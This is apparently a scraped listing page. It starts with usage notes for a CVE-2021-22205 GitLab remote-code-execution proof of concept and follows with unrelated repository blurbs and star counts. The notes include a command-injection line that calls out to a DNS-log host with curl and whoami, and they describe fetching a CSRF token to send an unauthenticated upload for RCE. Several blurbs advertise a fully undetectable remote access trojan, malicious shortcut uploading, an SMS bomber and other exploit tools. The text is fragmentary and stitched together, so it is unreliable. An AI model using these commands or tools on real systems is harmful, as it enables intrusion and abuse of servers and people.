影响版本:
Usage
python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog"
获取csrf-token:
通过 /users/sign_in 获取csrf-token 然后使用前面的 CVE-2021-22205 poc 进行构造上传包进行执行未经身份验证的上传请求,最终rce
ref:
CVE-2021-21985 CVE-2021-21985 EXP 本文以及工具仅限技术分享,严禁用于非法用途,否则产生的一切后果自行承担。 0x01 利用Tomcat RMI RCE 1. VPS启动JNDI监听 1099 端口 rmi需要bypass高版本jdk java -jar JNDIIn
Js File Scanner This is Js File Scanner . Which are scan in js file and find juicy information Toke,Password Etc.
EthTx Community Edition Community version of EthTx transaction decoder Local environment For local instance, you need few things: Depending on your di
Python sandbox runners for executing code in isolation aka snekbox.
About: Arbitrium is a cross-platform is a remote access trojan (RAT), Fully UnDetectable (FUD), It allows you to control Android, Windows and Linux an
Easy to setup customizable honeypots for monitoring network traffic, bots activities and username\password credentials. The current available honeypot
Lnkbomb Lnkbomb is used for uploading malicious shortcut files to insecure file
0x00 介绍 tig Threat Intelligence Gathering 威胁情报收集,旨在提高蓝队拿到攻击 IP 后对其进行威胁情报信息收集的效率,目前已集成微步、IP 域名反查、Fofa 信息收集、ICP 备案查询、IP 存活检测五个模块,现已支持以下信息的查询: ✅ 微步标签 ✅ I
Acc-Data-Gen Allows you to generate a password, e-mail & token for your Minecraft Account How to use the generator: Move all the files in a single dir
Example on how to query events by a RESTful API, compose CEF event format and send the events to an UDP receiver.
int-obfuscator Obfuscate your python code into a string of integers. De-obfuscate also supported. How it works: Each printable character gets replaced
DirBruter DirBruter is a Python based CLI tool. It looks for hidden or existing directories/files using brute force method. It basically works by laun
A Superfast SMS & Call bomber for Linux And Termux !
OracleOTM Python tool for exploiting CVE-2021-35616 The script works in modules, which I implemented in the following order: ► Username enumeration ►
Cleansweep Requirements A Linux (or Mac OS X) node with the following software installed. Ubuntu 14.04 is preferred. PostgreSQL 9.3 database server Py
LaxrFar Python Obfuscator Usage First do the things from "Upload to Webserver" o
AMC (Automatic Media Access Control [MAC] Address Spoofing tool), helps you to protect your real network hardware identity. Each entered time interval your hardware address was changed automatically.
CodeTest信息收集和漏洞利用工具,可在进行渗透测试之时方便利用相关信息收集脚本进行信息的获取和验证工作,漏洞利用模块可选择需要测试的漏洞模块,或者选择所有模块测试,包含CVE-2020-14882, CVE-2020-2555等,可自己收集脚本后按照模板进行修改。
What is Buff? A simple BOF library I wrote under an hour to help me automate with BOF attack. It comes with fuzzer and a generic method to generate ex
ReconTracer A Tool for subdomain scan with other tools ReconTracer Find subdomains by using another amazing sources!. Obs: In a close future recontrac
355 Aug 03, 2022
122 Dec 12, 2022
240 Dec 21, 2022
164 Dec 20, 2022
861 Feb 18, 2021
259 Dec 31, 2022
216 Jan 08, 2023
698 Dec 09, 2022
2 May 16, 2022
3 Feb 10, 2022
6 Nov 13, 2022
12 Dec 17, 2022
15 Feb 21, 2022
11 Dec 06, 2022
39 May 24, 2022
5 Jul 19, 2022
14 Dec 23, 2022
23 Mar 18, 2021
3 Nov 21, 2022
15 Dec 18, 2021